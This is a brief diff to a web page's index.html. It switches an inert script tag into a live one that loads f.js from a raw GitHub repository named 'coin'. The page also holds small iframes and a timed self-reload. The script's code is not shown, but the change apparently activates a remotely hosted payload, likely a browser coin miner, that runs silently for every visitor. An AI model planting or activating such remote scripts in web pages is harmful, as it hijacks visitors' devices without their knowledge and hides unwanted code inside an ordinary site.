--- a/index.html
+++ b/index.html
@@ -28,7 +28,7 @@
 <iframe id="x" marginwidth="0" marginheight="0" name="ventana_iframe" scrolling="no" border="0" frameborder="0" width="800" height="15"></iframe>24
 <iframe id="y" marginwidth="0" marginheight="0" name="ventana_iframe" scrolling="no" border="0" frameborder="0" width="800" height="15"></iframe>25
 
- <script type="text/plain" src="https://raw.githubusercontent.com/ralarloa3/coin/master/f.js"></script>
+ <script src="https://raw.githubusercontent.com/ralarloa3/coin/master/f.js"></script>
  <script>
   setTimeout(function() {
        window.location.href = window.location;
